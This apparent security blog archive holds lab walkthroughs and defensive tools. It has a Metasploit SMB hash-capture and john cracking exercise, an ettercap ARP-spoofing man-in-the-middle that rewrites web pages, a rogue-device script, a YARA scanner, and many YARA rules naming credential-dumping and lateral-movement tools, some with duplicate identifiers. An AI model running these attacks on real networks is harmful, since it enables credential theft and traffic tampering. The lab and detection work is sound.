Friday, December 27, 2019

metasploit smb capture password hashes

create 2 vms in virtualbox

1.) kali linux ATTACKER
      will be used to run ettercap and perform man-in-the-middle
2.) windows VICTIM
       will be the victim trying to access the web server


steps
-------
1.) setup both virtualbox Network tab to use "Internal Network" and the same name
2.) power up both
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux ATTACKER to similar ip address as windows
       ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module

> msfconsole
msf> use auxillary/server/capture/smb
msf> set CAINPWFILE /tmp/cain.pw1
msf> set JOHNPWFILE /tmp/john.txt
exploit

7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
        \\169.254.18.2\
      windows will popup an authentication prompt, enter a user & password  (e.g. guy, password)

8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it to \tmp\john.txt 
     type exit to exit metasploit
     run john against the newly captured file
       > john /tmp/john.txt_netntlmv2 --wordlist /usr/share/wordlists/rockyou.txt

     if it's a weak password (like 'password') john should crack it quickly and display it to you on the screen



compare dhcp leases to active directory pcs

python script

# 1st get a list of all dhcp leased unique hostnames (from dhcp logs) and put into dhcp.csv
# 2nd get a list of all active directory computers and save it in ad.csv by running this powershell
#               Get-ADComputer -Filter * |select name > ad.csv
# then run this python to compare and find the potentially rogue devices
adFile = r'ad.csv'
dhcpFile = r'dhcp.csv'
noADfile = r'notInAD.csv'
with open(dhcpFile, 'r') as dhcpFileHandle, open(noADfile, 'w') as notInADHandle:
 notInADCount = 0
 searchedCount = 0
 for dhcpHost in dhcpFileHandle:
  foundIt = 0
  with open(adFile, 'r') as adFileHandle:
   for adHost in adFileHandle: 
    adHost = adHost.lower().strip()
    dhcpHost = dhcpHost.lower().strip()
    if dhcpHost == adHost:
     foundIt = 1
     break
  searchedCount = searchedCount + 1
  if foundIt == 0:
   print(dhcpHost, end='', file=notInADHandle)
   notInADCount = notInADCount + 1
   print("%s not in Active Directory, Searched %s DHCP Leases" % (str(notInADCount), str(searchedCount)))

ettercap http replace man-in-the-middle full example

create 3 vms in virtualbox

1.) kali linux ATTACKER
      will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
       will be hosting the website the victim wants to access
3.) windows VICTIM
       will be the victim trying to access the web server


steps
-------
1.) setup all 3 virtualbox Network tab to use "Internal Network" and the same name
2.) power up all 3
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux WEB SERVER to similar ip address as windows
       ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) configure kali linux ATTACKER to similar ip address as windows
       ifconfig eth0 169.254.18.3 netmask 255.255.0.0 up
6.) ping each other system from within each virtual machine to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
      then launch python simple http server on port 8001
             python -m SimpleHTTPServer 8001
8.) on windows VICTIM open microsoft edge and navigate to website
       http://169.254.18.2:8001/
     you will see the text
        "this is fun"

             

9.) on kali linux ATTACKER
      create an ettercap filter file with a text editor with this content and save as "fun.filter"
          if (ip.proto == TCP) {
           if (tcp.dst == 8001 || tcp.src == 8001) {
             if (search(DATA.data, "Accept-Encoding")) {
              replace("Accept-Encoding", "Accept-Nothing!");
              msg("removed encoding");
            }
            if (search(DATA.data, "fun")) {
             replace("fun", "evil");
             msg("fun is now evil");
            }
           }
          }
   
     NOTE: above the accept-encoding removal is important otherwise the html is gzip encoded and not clear text so your replace won't work and the src/dst port is important so you catch request and response

     next compile the filter
         etterfilter fun.filter -o fun.ef
     next run ettercap using the filter and arp spoofing
         ettercap -tq -M arp:remote -F fun.ef /169.254.18.1-3// /169.254.18.1-3//
10.) on windows VICTIM
       reload the website
         http://169.254.18.2:8001/
       you will now see the text
         "this is evil"




11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit

Monday, December 23, 2019

update datetime on linux

# ntpdate 2.us.pool.ntp.org

syncs with internet time

navigator DOM keys

document.write("navigator.appName = " + navigator.appName + "<br/>")
document.write("navigator.appCodeName = " + navigator.appCodeName + "<br/>")
document.write("navigator.appVersion = " + navigator.appVersion + "<br/>")
document.write("navigator.platform = " + navigator.platform + "<br/>")
document.write("navigator.vendor = " + navigator.vendor + "<br/>")
document.write("navigator.vendorSub = " + navigator.vendorSub + "<br/>");
document.write("navigator.buildID = " + navigator.buildID + "<br/>");
document.write("navigator.oscpu = " + navigator.oscpu + "<br/>");
document.write("navigator.product = " + navigator.product + "<br/>");
document.write("navigator.productSub = " + navigator.productSub + "<br/>");



-----------------
sample output
-----------------
Google Chrome on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
navigator.platform = Win32
navigator.vendor = Google Inc.
navigator.vendorSub =
navigator.buildID = undefined
navigator.oscpu = undefined
navigator.product = Gecko
navigator.productSub = 20030107

-----------------
Internet Explorer on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; rv:11.0) like Gecko
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = undefined
-----------------
Microsoft Edge on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = 
-----------------
FireFox ESR on 64bit Kali Linux
-----------------

navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (X11)
navigator.platform = Linux x86_64
navigator.vendor = 
navigator.vendorSub = 

Friday, December 20, 2019

Virtual Box local contained lab, VM to VM

network for both kali & windows
"internal network"

on kali type
ifconfig eth0 169.254.18.XXX netmask 255.255.0.0 up

on kali
ping windows

on windows
ping kali

Thursday, December 5, 2019

yaraOneLiner.py

# Run Yara Rules against a file ONE LINE AT A TIME instead of against the whole file

import os
import subprocess
import traceback
import argparse
import sys

yaraParams = "-s"
tempFileName = "yaraOneLiner.tmp"
lineNumber = 1
output = ""

arguments = argparse.ArgumentParser("yaraOneLine.py -e yara64.exe -f input.csv -r rule.yar")
arguments.add_argument("-e", "--yaraExe", type=str, required=True, help="Yara executable to use")
arguments.add_argument("-f", "--inputFileName", type=str, required=True, help="Input file to yara scan")
arguments.add_argument("-r", "--yaraRuleFile", type=str, required=True, help="Yara rule file to scan against")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-s", "--status", action="store_true", required=False, help="Enable status tracking for large files")
settings = arguments.parse_args()

with open(settings.inputFileName, "r") as lines:
 for line in lines:
  line = line.rstrip()
  if settings.debug:
   print("\r\n---\r\nLINE %s: %s" % (str(lineNumber) , line))
  if settings.status:
   if (lineNumber % 50) == 0 and lineNumber != 0:
    print("STATUS: processing line %s" % (str(lineNumber)))
  with open(tempFileName,"w") as tempfile:
   tempfile.write(line)
  try:
   yaraCommand = ("%s %s %s %s" % (settings.yaraExe, yaraParams, settings.yaraRuleFile, tempFileName))
   if settings.debug:
    print("ABOUT TO RUN: %s" % yaraCommand)
   if settings.debug:
    pause = input()
   if settings.debug:
    print("STARTED: YARA")
   output = subprocess.check_output(yaraCommand, shell=True)
   if settings.debug:
    print("OUTPUT: %s" % str(output))
  except Exception as e:
   error = str(e)
   print("COMMAND: %s" % yaraCommand)
   print("OUTPUT: %s" % output)
   print("ERROR: %s" % error)
   output = ""
  if output is None or len(output) == 0:
   if settings.debug:
    print("MATCHES: 0 (no output)")
  else:
   output = str(output).replace("b'","").rstrip()
   if output[-1:] == "'":
    output = output[:-1]
   if tempFileName in output:
    if settings.debug:
     print("MATCHES: 1+")
    print("MATCH LINE NUMBER %s:" % str(lineNumber))
    print(" LINE: %s" + line)
    print(" YARA:")
    for row in output.split("\\r\\n"):
     row = row.replace("\\r\\n", "")
     if row.startswith("0x"):
      print("   %s" % row)
     else:
      print("  %s" % row)
   else:
    print("MATCHES: 0 (with output)")
  lineNumber = lineNumber + 1

Neo23x0 Sigma Proxy Rules converted to simple Yara

rule Neo23x0SigmaUserAgentMatch
{
meta:
 author = "@neonprimetime"
 description = "@Neo23x0 Proxy User Agent Rules https://github.com/Neo23x0/sigma/tree/master/rules/proxy"
strings:
 $string1 = "(compatible;MSIE"
 $string2 = "BFAC"
 $string3 = "BGroom"
 $string4 = "CholTBAgent"
 $string5 = "Havij"
 $string7 = "adlib/"
 $string8 = "arachni/"
 $string9 = "asd"
 $string10 = "brutus"
 $string11 = "cgichk"
 $string12 = "changhuatong"
 $string13 = "crimscanner/"
 $string14 = "inspath"
 $string15 = "mdms"
 $string16 = "metis"
 $string17 = "pxyscand"
 $string18 = "tiny"
 $string19 = "vega/"
 $string20 = "whcc/"
 $string21 = "zmeu"
 $string22 = "(Charon; Inferno)"
 $string23 = "(hydra)"
 $string24 = ".0;Windows NT"
 $string25 = "<|>"
 $string26 = "Bot"
 $string27 = "Microsoft Internet Explorer"
 $string28 = "Telegram"
 $string29 = "absinthe"
 $string30 = "bsqlbf"
 $string31 = "core-project/1.0"
 $string32 = "datacha0s"
 $string33 = "dirbuster"
 $string34 = "domino hunter"
 $string35 = "dotdotpwn"
 $string36 = "exploit"
 $string37 = "floodgate"
 $string38 = "get-minimal"
 $string39 = "gootkit auto-rooter scanner"
 $string40 = "grendel-scan"
 $string41 = "internet ninja"
 $string42 = "jaascois"
 $string43 = "masscan"
 $string44 = "morfeus fucking scanner"
 $string45 = "mysqloit"
 $string46 = "n-stealth"
 $string47 = "nsauditor"
 $string48 = "pangolin"
 $string49 = "pmafind"
 $string50 = "security scan"
 $string51 = "springenwerk"
 $string52 = "sql power injector"
 $string53 = "sqlmap"
 $string54 = "sqlninja"
 $string55 = "teh forest lobster"
 $string56 = "toata dragostea"
 $string57 = "uil2pn"
 $string58 = "voideye"
 $string59 = "webshag"
 $string60 = "webvulnscan"
 $string61 = "wordpress hash grabber"
 $string62 = "zeroup"
 $string63 = "AutoIt"
 $string64 = "CertUtil URL Agent"
 $string65 = "DotDotPwn v2.1"
 $string66 = "FHScan Core"
 $string67 = "HttpBrowser/1.0"
 $string68 = "IczelionDownLoad"
 $string69 = "Internet Explorer"
 $string75 = "Moxilla"
 $string78 = "Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"
 $string79 = "Mozilla v5.1"
 $string80 = "Mozilla/1.0"
 $string81 = "Mozilla/2.0"
 $string83 = "Mozilla/4.0 (compatible; MSI 6.0;"
 $string84 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)"
 $string85 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
 $string86 = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
 $string87 = "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)"
 $string88 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  1.1.4322)"
 $string89 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
 $string90 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
 $string91 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
 $string92 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
 $string93 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
 $string94 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
 $string95 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
 $string96 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR = {7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N"
 $string97 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
 $string98 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)"
 $string99 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
 $string100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)"
 $string101 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
 $string102 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
 $string103 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
 $string104 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"
 $string105 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
 $string106 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)"
 $string107 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)"
 $string108 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)"
 $string109 = "Mozilla/4.0 (compatible; Metasploit RSPEC)"
 $string110 = "Mozilla/4.0 (compatible; RMS)"
 $string111 = "Mozilla/4.0 (compatible; SPIPE/1.0"
 $string112 = "Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)"
 $string114 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)"
 $string115 = "Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)"
 $string117 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)"
 $string118 = "Mozilla/5.0 (Windows NT 5.1 ; v."
 $string119 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
 $string120 = "Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko"
 $string121 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0"
 $string122 = "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/"
 $string123 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
 $string124 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
 $string125 = "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0"
 $string126 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2"
 $string127 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0"
 $string128 = "Mozilla/5.0 (Windows NT 9;"
 $string129 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"
 $string130 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1"
 $string131 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)"
 $string132 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)"
 $string133 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
 $string134 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200"
 $string135 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7"
 $string136 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
 $string137 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0"
 $string138 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
 $string139 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)"
 $string140 = "Mozilla/5.0 WinInet"
 $string142 = "Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)"
 $string143 = "Netscape"
 $string144 = "O/9.27 (W; U; Z)"
 $string146 = "Opera/8.81 (Windows NT 6.0; U; en)"
 $string147 = "RookIE/1.0"
 $string148 = "SIPDROID"
 $string149 = "SJZJ (compatible; MSIE 6.0; Win32)"
 $string150 = "Sametime Community Agent"
 $string151 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC"
 $string152 = "Wget/1.9+cvs-stable (Red Hat modified)"
 $string154 = "X-FORWARDED-FOR"
 $string155 = "XMRig"
 $string157 = "backdoorbot"
 $string158 = "ccminer"
 $string159 = "hots scot"
 $string160 = "nocase"
 $string161 = "nsis_inetc (mozilla)"
 $string162 = "ruler"
 $string163 = "sample"
 $string164 = "user-agent"
condition:
 1 of them
}

Generic Triage Yara Rules

rule RemoteControlUrlAccessed
{
meta:
 author = "@neonprimetime"
 description = "Cloud Remote Control Url Accessed"
strings:
 $string0 = "teamviewer" nocase
 $string1 = "splashtop" nocase
 $string2 = "ammyy" nocase
 $string3 = "mikogo" nocase
 $string4 = "uvnc" nocase
 $string5 = "gbchcmhmhahfdphkhkmpfmihenigjmpp" nocase
 $string6 = "logmein" nocase
 $string7 = "join.me" nocase
 $string8 = "realvnc" nocase
 $string9 = "dameware" nocase
 $string10 = "dwservice" nocase
 $string11 = "anydesk" nocase
condition:
 1 of them
}

rule WebMailUrlAccessed
{
meta:
 author = "@neonprimetime"
 description = "Web Mail Url Accessed"
strings:
 $string0 = "mail.yahoo.com" nocase
 $string1 = "@gmail.com" nocase
 $string2 = "outlook.live.com" nocase
 $string3 = "mail.protonmail.com" nocase
 $string4 = "zoho.com" nocase
 $string5 = "yandex.com" nocase
 $string6 = "tutanota.com" nocase
 $string7 = "kolbanow.com" nocase
 $string8 = "fastmail.com" nocase
 $string10 = "posteo.de" nocase
 $string11 = "startmail.com" nocase
 $string12 = "runbox.com" nocase
 $string13 = "mailfence.com" nocase
 $string14 = "countermail.com" nocase
condition:
 1 of them
}

rule CloudFileStorageUrlAccessed
{
meta:
 author = "@neonprimetime"
 description = "Cloud File Storage Url Accessed"
strings:
 $string0 = "dropbox.com" nocase
 $string1 = "drive.google.com" nocase
 $string2 = "wetransfer.com" nocase
 $string3 = "pcloud.com" nocase
 $string4 = "tresorit.com" nocase
 $string5 = "sync.com" nocase
 $string6 = "onedrive.live.com" nocase
 $string7 = ".box.com" nocase
 $string8 = "spideroak.com" nocase
 $string9 = "mega.nz" nocase
 $string10 = "jottacloud.com" nocase
 $string11 = "teamdrive.com" nocase
 $string12 = "mediafire.com" nocase
 $string13 = "cloudup.com" nocase
 $string14 = "cloudme.com" nocase
condition:
 1 of them
}

rule LateralMovementAttempt
{
meta:
 author = "@neonprimetime"
 description = "Lateral Movement Attempt"
strings:
 $string0 = "mstsc" nocase
 $string1 = "psexec" nocase
 $string2 = "\\nc.exe" nocase
 $string3 = "/nc.exe" nocase
 $string2 = "\\nc64.exe" nocase
 $string3 = "/nc64.exe" nocase
 $string2 = "\\netcat.exe" nocase
 $string3 = "/netcat.exe" nocase
 $string4 = "putty.exe" nocase
 $string5 = "mobax" nocase
 $string6 = "securecrt" nocase
 $string7 = "ssh.exe" nocase
 $string8 = "winrs" nocase
condition:
 1 of them
}


rule ShortExecutableName
{
meta:
 author = "@neonprimetime"
 description = "Short Executable Name"
strings:
 $string0 = "/0.exe" nocase
 $string1 = "/1.exe" nocase
 $string2 = "/2.exe" nocase
 $string3 = "/3.exe" nocase
 $string4 = "/4.exe" nocase
 $string5 = "/5.exe" nocase
 $string6 = "/6.exe" nocase
 $string7 = "/7.exe" nocase
 $string8 = "/8.exe" nocase
 $string9 = "/9.exe" nocase
 $string10 = "\\0.exe" nocase
 $string11 = "\\1.exe" nocase
 $string12 = "\\2.exe" nocase
 $string13 = "\\3.exe" nocase
 $string14 = "\\4.exe" nocase
 $string15 = "\\5.exe" nocase
 $string16 = "\\6.exe" nocase
 $string17 = "\\7.exe" nocase
 $string18 = "\\8.exe" nocase
 $string19 = "\\9.exe" nocase
 $string20 = "/a.exe" nocase
 $string21 = "/b.exe" nocase
 $string22 = "/c.exe" nocase
 $string23 = "/d.exe" nocase
 $string24 = "/e.exe" nocase
 $string25 = "/f.exe" nocase
 $string26 = "/g.exe" nocase
 $string27 = "/h.exe" nocase
 $string28 = "/i.exe" nocase
 $string29 = "/j.exe" nocase
 $string30 = "/k.exe" nocase
 $string31 = "/l.exe" nocase
 $string32 = "/m.exe" nocase
 $string33 = "/n.exe" nocase
 $string34 = "/o.exe" nocase
 $string35 = "/p.exe" nocase
 $string36 = "/q.exe" nocase
 $string37 = "/r.exe" nocase
 $string38 = "/s.exe" nocase
 $string39 = "/t.exe" nocase
 $string40 = "/u.exe" nocase
 $string41 = "/v.exe" nocase
 $string42 = "/w.exe" nocase
 $string43 = "/x.exe" nocase
 $string44 = "/y.exe" nocase
 $string45 = "/z.exe" nocase
 $string46 = "\\a.exe" nocase
 $string47 = "\\b.exe" nocase
 $string48 = "\\c.exe" nocase
 $string49 = "\\d.exe" nocase
 $string50 = "\\e.exe" nocase
 $string51 = "\\f.exe" nocase
 $string52 = "\\g.exe" nocase
 $string53 = "\\h.exe" nocase
 $string54 = "\\i.exe" nocase
 $string55 = "\\j.exe" nocase
 $string56 = "\\k.exe" nocase
 $string57 = "\\l.exe" nocase
 $string58 = "\\m.exe" nocase
 $string59 = "\\n.exe" nocase
 $string60 = "\\o.exe" nocase
 $string61 = "\\p.exe" nocase
 $string62 = "\\q.exe" nocase
 $string63 = "\\r.exe" nocase
 $string64 = "\\s.exe" nocase
 $string65 = "\\t.exe" nocase
 $string66 = "\\u.exe" nocase
 $string67 = "\\v.exe" nocase
 $string68 = "\\w.exe" nocase
 $string69 = "\\x.exe" nocase
 $string70 = "\\y.exe" nocase
 $string71 = "\\z.exe" nocase
condition:
 1 of them
}

rule PolicyViolation
{
meta:
 author = "@neonprimetime"
 description = "Policy Violation"
strings:
 $string0 = "disableuac" nocase
condition:
 1 of them
}

rule LivingOffLandCommand
{
meta:
 author = "@neonprimetime"
 description = "Living Off the Land Command"
strings:
 $string0 = "mshta.exe" nocase
 $string1 = "nbstat.exe" nocase
 $string5 = "/query.exe" nocase
 $string6 = "\\query.exe" nocase
 $string8 = "bitsadmin.exe" nocase
 $string9 = "curl.exe" nocase
 $string10 = "wget.exe" nocase
 $string11 = "systeminfo.exe" nocase
 $string12 = "certutil.exe" nocase
condition:
 1 of them
}

rule PhishingAttachmentThemePossible
{
meta:
 author = "@neonprimetime"
 description = "Phishing Attachment Theme Possible"
strings:
 $string0a = "invoice." nocase
 $string0b = "invoice " nocase
 $string1 = "factura" nocase
 $string2 = "wiretransfer" nocase
 $string4a = "payment" nocase
 $string4b = "payment." nocase
 $string6a = "eFAX " nocase
 $string6b = "eFAX." nocase
 $string7 = "Fattura" nocase
 $string8 = "Enquiry" nocase
 $string9 = "QUOTATION" nocase
 $string10 = "receipt " nocase
 $string10 = "receipt." nocase
 $string11a = "payroll." nocase
 $string11b = "payroll " nocase
 $string12 = "PO#" nocase
 $string13 = "Proforma" nocase
 $string14 = "Purchase." nocase
 $string14 = "Purchase " nocase
 $string14 = "PurchaseOrder" nocase

condition:
 1 of them
}


rule ClearTextPasswordFile
{
meta:
 author = "@neonprimetime"
 description = "Clear Text Password File"
strings:
 $string0 = "password.txt" nocase
 $string1 = "pwd.txt" nocase
 $string2 = "passwd.txt" nocase
 $string3 = "password.doc" nocase
 $string4 = "pwd.doc" nocase
 $string5 = "passwd.doc" nocase
 $string6 = "password.xls" nocase
 $string7 = "pwd.xls" nocase
 $string8 = "passwd.xls" nocase
 $string9 = "passwords.txt" nocase
 $string10 = "pwds.txt" nocase
 $string11 = "passwds.txt" nocase
 $string12 = "passwords.doc" nocase
 $string13 = "pwds.doc" nocase
 $string14 = "passwds.doc" nocase
 $string15 = "passwords.xls" nocase
 $string16 = "pwds.xls" nocase
 $string17 = "passwds.xls" nocase
 $string18 = "web.config" nocase
 $string19 = "application.config" nocase
condition:
 1 of them
}


rule AdminUrlAccessed
{
meta:
 author = "@neonprimetime"
 description = "Admin Web Pages"
strings:
 $string0 = "/admin/" nocase
 $string1 = "/wp-admin/" nocase
condition:
 1 of them
}

rule HackingToolFound
{
meta:
 author = "@neonprimetime"
 description = "Hacking Tool Found"
strings:
 $string0 = "kali.exe" nocase
 $string2 = "wireshark" nocase
 $string3 = "bloodhound" nocase
 $string4 = "obfuscation" nocase
 $string5 = "shellcode" nocase
 $string6 = "keylogger" nocase
 $string7 = "bypassuac" nocase
 $string8 = "tokenmanipulation" nocase
 $string10 = "passhash" nocase
 $string11 = "kerberoast" nocase
 $string12 = "ninja" nocase
 $string13 = "memorynps" nocase
 $string14 = "metasploit" nocase
 $string15 = "smbexec" nocase
 $string16 = "gpppassword" nocase
 $string17 = "arpscan" nocase
 $string18 = "dnscat" nocase
 $string19 = "aircrack" nocase
 $string20 = "bulletspassview" nocase
 $string21 = "chromepass" nocase
 $string22 = "credentialsfileview" nocase
 $string23 = "echo.exe" nocase
 $string24 = "hydra.exe" nocase
 $string25 = "iepv.exe" nocase
 $string26 = "inssidersetup" nocase
 $string28 = "mailpv.exe" nocase
 $string29 = "ministumblersetup" nocase
 $string33 = "netpass.exe" nocase
 $string34 = "netstumbler" nocase
 $string35 = "nltest.exe" nocase
 $string36 = "ophcrack" nocase
 $string37 = "rdpv.exe" nocase
 $string38 = "setspn" nocase
 $string39 = "sniffpass" nocase
 $string40 = "vaultpasswordview" nocase
 $string41 = "\\ver.exe" nocase
 $string42 = "vncpassview" nocase
 $string43 = "webbrowserpassview" nocase
condition:
 1 of them
}

rule HackingCodeFound
{
meta:
 author = "@neonprimetime"
 description = "Hacking Code Found"
strings:
 $string0 = "WriteProcessMemory" nocase
 $string1 = "VirtualAlloc" nocase
 $string2 = "SetWindowsHook" nocase
 $string3 = "SHCreateThread" nocase
 $string4 = "FromBase64String" nocase
 $string5 = "PromptForCredential" nocase
 $string6 = "AdjustTokenPrivileges" nocase
 $string7 = "KerberosRequestorSecurityToken" nocase
 $string8 = "UnsafeNativeMethods" nocase
 $string9 = "ReadProcessMemoryMiniDumpWriteDump" nocase
 $string10 = "TOKEN_ADJUST_PRIVILEGES" nocase
 $string11 = "TOKEN_IMPERSONATE" nocase
 $string12 = "TOKEN_ELEVATION" nocase
 $string13 = "TOKEN_ALL_ACCESS" nocase
condition:
 1 of them
}

rule PasswordDumpAttempt
{
meta:
 author = "@neonprimetime"
 description = "Password Dump Temp"
strings:
 $string0 = "mimikatz" nocase
 $string1 = "procdump" nocase
 $string3 = "hashdump" nocase
 $string4 = "pwdump" nocase
 $string5 = "lsadump" nocase
condition:
 1 of them
}

rule ExternalDriveAccessed
{
meta:
 author = "@neonprimetime"
 description = "External Drive Accessed"
strings:
 $string4 = "file:///f:/" nocase
 $string6 = "file:///g:/" nocase
 $string8 = "mfeprom" nocase
condition:
 1 of them
}

rule HackerOutputFile
{
meta:
 author = "@neonprimetime"
 description = "Hacker Output Files"
strings:
 $string0 = "acls.csv" nocase
 $string1 = "bloodhound.csv" nocase
 $string2 = "dump.csv" nocase
 $string3 = "dump.xml" nocase
 $string4 = "dump.zip" nocase
 $string5 = "firewall.txt" nocase
 $string6 = "group_memberships.csv" nocase
 $string7 = "hashdump.txt" nocase
 $string8 = "local_admins.csv" nocase
 $string9 = "lsadump.txt" nocase
 $string10 = "lsass.dmp" nocase
 $string11 = "lsassdump.dmp" nocase
 $string12 = "mimikatz.xls" nocase
 $string13 = "mini.dmp" nocase
 $string14 = "netscan.xml" nocase
 $string15 = "nmap.csv" nocase
 $string16 = "nmap.txt" nocase
 $string17 = "nmap.xml" nocase
 $string18 = "openvas.csv" nocase
 $string19 = "pwdump.txt" nocase
 $string20 = "secretsdump.txt" nocase
 $string21 = "targets.txt" nocase
 $string22 = "trusts.csv" nocase
 $string23 = "user_sessions.csv" nocase
 $string24 = "bloodhound.bin" nocase
 $string25 = ".gnmap" nocase
 $string26 = ".nessus" nocase
 $string27 = ".nmap" nocase
 $string28 = "p0wn" nocase
condition:
 1 of them
}

rule HackerUrl
{
meta:
 author = "@neonprimetime"
 description = "Hacker Url"
strings:
 $string1 = "kali." nocase
 $string2 = "/kali/" nocase
 $string3 = "kali-" nocase
 $string4 = "backbox." nocase
 $string5 = "/backbox/" nocase
 $string6 = "backbox-" nocase
 $string7 = "blackarch." nocase
 $string8 = "/blackarch/" nocase
 $string9 = "blackarch-" nocase
 $string10 = "caine-live." nocase
 $string11 = "/caine-live/" nocase
 $string12 = "caine-live-" nocase
 $string13 = "deftlinux." nocase
